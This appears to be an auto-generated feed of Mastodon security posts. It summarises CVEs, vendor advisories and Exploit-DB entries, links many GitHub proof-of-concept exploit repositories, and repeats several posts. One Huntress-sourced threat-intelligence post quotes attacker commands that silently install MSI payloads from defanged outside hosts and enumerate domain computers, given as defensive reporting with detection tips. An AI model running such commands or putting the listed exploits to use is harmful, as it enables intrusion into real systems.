##updated 2026-02-09T22:39:36
2 posts
Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei https://masto.kukei.eu/browse/programming category:
- Git default branch: Git 3.0 will make "main" the default branch by end of 2026.
- COLRv1 in WebKit: COLRv1 font rendering support in WebKit.
- Linux kernel 7.0: io_uring gains filtering support (cBPF opcodes) and per-task filters.
- AWS Lambda CVEs: 29 CVEs across 27 Lambda base images; CVE-2026-25639 affecting base images.
- Post-OOP: Move [1/2]
🟠 CVE-2026-25639 - High (7.5)
Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25639/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T21:55:30.093000
1 posts
🟠 CVE-2026-25761 - High (8.8)
Super-linter is a combination of multiple linters to run as a GitHub Action or standalone. From 6.0.0 to 8.3.0, the Super-linter GitHub Action is vulnerable to command injection via crafted filenames. When this action is used in downstream GitHub ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25761/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T21:55:30.093000
1 posts
🔴 CVE-2026-25057 - Critical (9.1)
MarkUs is a web application for the submission and grading of student assignments. Prior to 2.9.1, instructors are able to upload a zip file to create an assignment from an exported configuration (courses//assignments/upload_config_files). The upl...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25057/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T21:53:03.017000
1 posts
🟠 CVE-2025-69214 - High (8.8)
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attac...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69214/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:28
2 posts
HGiga Patches Critical Authentication Bypass and SQL Injection Flaws in C&Cm@il
HGiga patched three vulnerabilities in its C&Cm@il platform, including a critical missing authentication flaw (CVE-2026-2234) that allows unauthenticated attackers to read and modify any user's emails.
**If you use HGiga C&Cm@il, plan a quick update to version 7.0-978. Since the most severe flaw allows attackers to read mail without a password, treat this as a high-priority emergency patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/hgiga-patches-critical-authentication-bypass-and-sql-injection-flaws-in-c-cm-il-b-m-r-j-8/gD2P6Ple2L
HGiga Patches Critical Authentication Bypass and SQL Injection Flaws in C&Cm@il
HGiga patched three vulnerabilities in its C&Cm@il platform, including a critical missing authentication flaw (CVE-2026-2234) that allows unauthenticated attackers to read and modify any user's emails.
**If you use HGiga C&Cm@il, plan a quick update to version 7.0-978. Since the most severe flaw allows attackers to read mail without a password, treat this as a high-priority emergency patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/hgiga-patches-critical-authentication-bypass-and-sql-injection-flaws-in-c-cm-il-b-m-r-j-8/gD2P6Ple2L
updated 2026-02-07T00:30:34
2 posts
3 repos
https://github.com/z3r0h3ro/CVE-2026-1731-exp
‼️ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)
##‼️ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)
##updated 2026-02-06T22:11:48
1 posts
🟠 CVE-2025-69212 - High (8.8)
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69212/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:47
2 posts
🔴 CVE-2026-25752 - Critical (9.1)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25752/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25752 - Critical (9.1)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25752/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:43
2 posts
🟠 CVE-2026-25751 - High (7.5)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25751/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25751 - High (7.5)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25751/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T19:06:46
2 posts
Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass
Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.
**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-gogs-vulnerabilities-enable-remote-code-execution-and-2fa-bypass-0-4-b-b-k/gD2P6Ple2L
Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass
Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.
**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-gogs-vulnerabilities-enable-remote-code-execution-and-2fa-bypass-0-4-b-b-k/gD2P6Ple2L
updated 2026-02-06T19:06:45
2 posts
Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass
Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.
**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-gogs-vulnerabilities-enable-remote-code-execution-and-2fa-bypass-0-4-b-b-k/gD2P6Ple2L
Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass
Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.
**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-gogs-vulnerabilities-enable-remote-code-execution-and-2fa-bypass-0-4-b-b-k/gD2P6Ple2L
updated 2026-02-06T18:30:43
1 posts
CVE-2026-2103 - Infor Syteline ERP
https://blog.blacklanternsecurity.com/p/cve-2026-2103-infor-syteline-erp
##updated 2026-02-06T18:30:29
1 posts
1 repos
Here's a summary of the latest technology and cybersecurity news from the last 24-48 hours:
Major tech firms globally plan to invest over $650 billion in AI infrastructure this year. OpenAI has launched "Frontier," a new enterprise platform for AI agents.
In cybersecurity, CISA mandated US federal agencies replace unsupported edge devices within 18 months due to state-sponsored exploitation. Russia's APT28 targeted European entities with a new Microsoft Office exploit. A critical SmarterMail flaw (CVE-2026-24423) is actively exploited in ransomware attacks. (Feb 6-7, 2026).
##updated 2026-02-06T17:37:28.723000
2 posts
2 repos
Palo Alto advisory, posted yesterday:
Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal https://security.paloaltonetworks.com/CVE-2026-0227 #PaloAlto #infosec #vulnerability
##Palo Alto advisory, posted yesterday:
Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal https://security.paloaltonetworks.com/CVE-2026-0227 #PaloAlto #infosec #vulnerability
##updated 2026-02-06T09:30:35
6 posts
Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.
SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.
Source: https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
💬 How are you reducing blast radius for management infrastructure?
🔔 Follow @technadu for threat-focused security coverage
#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu
##The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
##Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution
Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.
**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-sql-injection-vulnerability-in-fortinet-forticlientems-allows-remote-code-execution-7-8-j-i-r/gD2P6Ple2L
Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.
SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.
Source: https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
💬 How are you reducing blast radius for management infrastructure?
🔔 Follow @technadu for threat-focused security coverage
#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu
##The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
##Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution
Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.
**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-sql-injection-vulnerability-in-fortinet-forticlientems-allows-remote-code-execution-7-8-j-i-r/gD2P6Ple2L
updated 2026-02-05T20:22:47.870000
5 posts
1 repos
https://github.com/otakuliu/Expression-Sandbox-Escape-Simulation-Lab
🐞 Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security // Het Mehta
「 CVE-2026-25049, a critical vulnerability with a CVSS score of 9.4 that let attackers execute arbitrary system commands on n8n servers. What makes this particularly interesting (and painful for n8n’s security team) is that this vulnerability bypassed a security fix they had just deployed two months earlier 」
##Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security via @wezm https://lobste.rs/s/wepiig #security
https://hetmehta.com/posts/n8n-type-confusion-rce/
🐞 Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security // Het Mehta
「 CVE-2026-25049, a critical vulnerability with a CVSS score of 9.4 that let attackers execute arbitrary system commands on n8n servers. What makes this particularly interesting (and painful for n8n’s security team) is that this vulnerability bypassed a security fix they had just deployed two months earlier 」
##Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security via @wezm https://lobste.rs/s/wepiig #security
https://hetmehta.com/posts/n8n-type-confusion-rce/
⚪ Critical bug in n8n opened the door to RCE
🗨️ A critical vulnerability has been discovered in the n8n workflow automation platform that allowed arbitrary command execution on the server side. The issue, identified as CVE-2026-25049 (scored 9.4 on the CVSS scale), affects the sandbox mechanism that is supposed to isolate the execution of JavaScr…
##updated 2026-02-05T14:57:20.563000
2 posts
Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##updated 2026-02-04T21:31:24
1 posts
9 repos
https://github.com/moften/CVE-2025-24054
https://github.com/Yuri08loveElaina/CVE-2025-24054_POC
https://github.com/Untouchable17/CVE-2025-24054
https://github.com/basekilll/CVE-2025-24054_PoC
https://github.com/rubenformation/CVE-2025-50154
https://github.com/S4mma3l/CVE-2025-24054
https://github.com/helidem/CVE-2025-24054_CVE-2025-24071-PoC
🚨 New Exploit: Windows 10.0.17763.7009 - spoofing vulnerability
📋 CVE: CVE-2025-24054
👤 Author: beatrizfn
🔗 https://www.exploit-db.com/exploits/52480
#ExploitDB #InfoSec #CyberSecurity #CVE-2025-24054
##updated 2026-02-04T02:00:02.030000
1 posts
----------------
🎯 Threat Intelligence
===================
Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.
Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.
Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.
Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.
Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.
🔹 solarwinds #CVE-2025-26399 #CVE-2025-40551 #velociraptor #zoho
🔗 Source: https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##updated 2026-01-30T13:28:18.610000
2 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws
A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilities—CVE-2026-1281 and CVE-2026-1340—attackers are…
##“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.
The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.
Security teams were told to consider this case an emergency patch situation.”
https://www.scworld.com/news/emergency-patches-advised-after-attacks-on-ivanti-epmm-devices
##updated 2026-01-30T00:31:28
2 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws
A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilities—CVE-2026-1281 and CVE-2026-1340—attackers are…
##“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.
The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.
Security teams were told to consider this case an emergency patch situation.”
https://www.scworld.com/news/emergency-patches-advised-after-attacks-on-ivanti-epmm-devices
##updated 2026-01-29T18:32:39
2 posts
@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?
CVE-2015-10145 — Published: 2025-12-31
##@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?
CVE-2015-10145 — Published: 2025-12-31
##updated 2026-01-29T15:31:31
2 posts
4 repos
https://github.com/guiimoraes/CVE-2025-15467
https://github.com/MAXI8594/CVE-2025-15467_Scan
This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.
Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 https://support.broadcom.com/web/ecx/security-advisory #infosec #Broadcom #vulnerability
##This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.
Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 https://support.broadcom.com/web/ecx/security-advisory #infosec #Broadcom #vulnerability
##updated 2026-01-13T18:31:17
1 posts
Windows Error Reporting Flaw Lets Standard Users Reach SYSTEM: Inside CVE-2026-20817
Introduction A quiet but deeply dangerous vulnerability inside Windows Error Reporting (WER) has exposed a new path for local privilege escalation, allowing ordinary users to obtain near-SYSTEM level control. Tracked as CVE-2026-20817 and patched by Microsoft in January 2026, the flaw sits in a core crash-handling mechanism that runs by default on nearly every Windows machine. While no…
##updated 2026-01-08T18:08:54.147000
2 posts
Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##updated 2026-01-08T18:08:54.147000
2 posts
Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##updated 2026-01-08T16:28:27.603000
1 posts
17 repos
https://github.com/xiaoQ1z/CVE-2023-4911
https://github.com/ruycr4ft/CVE-2023-4911
https://github.com/chaudharyarjun/LooneyPwner
https://github.com/KernelKrise/CVE-2023-4911
https://github.com/Diego-AltF4/CVE-2023-4911
https://github.com/snurkeburk/Looney-Tunables
https://github.com/Green-Avocado/CVE-2023-4911
https://github.com/leesh3288/CVE-2023-4911
https://github.com/KillReal01/CVE-2023-4911
https://github.com/teraGL/looneyCVE
https://github.com/NishanthAnand21/CVE-2023-4911-PoC
https://github.com/RickdeJager/CVE-2023-4911
https://github.com/Billar42/CVE-2023-4911
https://github.com/puckiestyle/CVE-2023-4911
https://github.com/guffre/CVE-2023-4911
https://github.com/hadrian3689/looney-tunables-CVE-2023-4911
🚨 New Exploit: glibc 2.38 - Buffer Overflow
📋 CVE: CVE-2023-4911
👤 Author: Beatriz Fresno Naumova
🔗 https://www.exploit-db.com/exploits/52479
#ExploitDB #InfoSec #CyberSecurity #CVE-2023-4911
##updated 2025-12-18T14:59:05.617000
2 posts
7 repos
https://github.com/bjrjk/CVE-2025-43529
https://github.com/SimoesCTT/CTT-Apple-Silicon-Refraction
https://github.com/sakyu7/sakyu7.github.io
https://github.com/jir4vv1t/CVE-2025-43529
https://github.com/SimoesCTT/Convergent-Time-Theory-Enhanced-iOS-Safari-RCE-CVE-2025-43529-
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
updated 2025-12-15T15:16:08.650000
2 posts
6 repos
https://github.com/George0Papasotiriou/CVE-2025-14174-Chrome-Zero-Day
https://github.com/typeconfused/CVE-2025-14174-analysis
https://github.com/sakyu7/sakyu7.github.io
https://github.com/Satirush/CVE-2025-14174-Poc
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
updated 2025-11-04T00:31:52
1 posts
#OT #Advisory VDE-2025-109
Phoenix Contact: Unbounded growth of the session cache in TCP encapsulation service in FL MGUARD 2xxx and 4xxx firmware
The OpenSSL library used in the affected products is vulnerable to an unbounded growth of the session cache in the TLSv1.3 implementation.
#CVE CVE-2024-2511
https://certvde.com/en/advisories/vde-2025-109/
#CSAF https://phoenixcontact.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2025-109.json
##updated 2025-11-03T21:48:21
1 posts
1 repos
🚨 New Exploit: motionEye 0.43.1b4 - RCE
📋 CVE: CVE-2025-60787
👤 Author: prabhat
🔗 https://www.exploit-db.com/exploits/52481
#ExploitDB #InfoSec #CyberSecurity #CVE-2025-60787
##updated 2025-10-22T00:34:26
2 posts
28 repos
https://github.com/Markusino488/cve-2025-8088
https://github.com/nhattanhh/CVE-2025-8088
https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC
https://github.com/0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC
https://github.com/Shinkirou789/Cve-2025-8088-WinRar-vulnerability
https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-
https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder
https://github.com/xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit
https://github.com/walidpyh/CVE-2025-8088
https://github.com/hbesljx/CVE-2025-8088-EXP
https://github.com/knight0x07/WinRAR-CVE-2025-8088-PoC-RAR
https://github.com/hexsecteam/CVE-2025-8088-Winrar-Tool
https://github.com/lucyna77/winrar-exploit
https://github.com/Syrins/CVE-2025-8088-Winrar-Tool-Gui
https://github.com/pentestfunctions/CVE-2025-8088-Multi-Document
https://github.com/techcorp/CVE-2025-8088-Exploit
https://github.com/ghostn4444/CVE-2025-8088
https://github.com/Ismael-20223/CVE-2025-8088
https://github.com/AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal
https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC
https://github.com/nuky-alt/CVE-2025-8088
https://github.com/jordan922/CVE-2025-8088
https://github.com/kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition
https://github.com/pescada-dev/-CVE-2025-8088
https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool
https://github.com/travisbgreen/cve-2025-8088
#CheckPoint Research observed #Amaranth-Dragon, a Chinese-aligned group linked to #APT41, conducting espionage against government and law enforcement across Southeast Asia. The threat actor weaponized #WinRAR flaw CVE-2025-8088 within 10 days after its disclosure, geo-fenced servers to targets, and introduced #TGAmaranth, a Telegram-based remote access tool.
###CheckPoint Research observed #Amaranth-Dragon, a Chinese-aligned group linked to #APT41, conducting espionage against government and law enforcement across Southeast Asia. The threat actor weaponized #WinRAR flaw CVE-2025-8088 within 10 days after its disclosure, geo-fenced servers to targets, and introduced #TGAmaranth, a Telegram-based remote access tool.
##updated 2025-10-22T00:34:26
4 posts
46 repos
https://github.com/AdityaBhatt3010/CVE-2025-53770-SharePoint-Zero-Day-Variant-Exploited-for-Full-RCE
https://github.com/exfil0/CVE-2025-53770
https://github.com/Bluefire-Redteam-Cybersecurity/bluefire-sharepoint-cve-2025-53770
https://github.com/Rabbitbong/OurSharePoint-CVE-2025-53770
https://github.com/paolokappa/SharePointSecurityMonitor
https://github.com/MuhammadWaseem29/CVE-2025-53770
https://github.com/Michaael01/LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell
https://github.com/Agampreet-Singh/CVE-2025-53770
https://github.com/GreenForceNetworks/Toolshell_CVE-2025-53770
https://github.com/harryhaxor/CVE-2025-53770-SharePoint-Deserialization-RCE-PoC
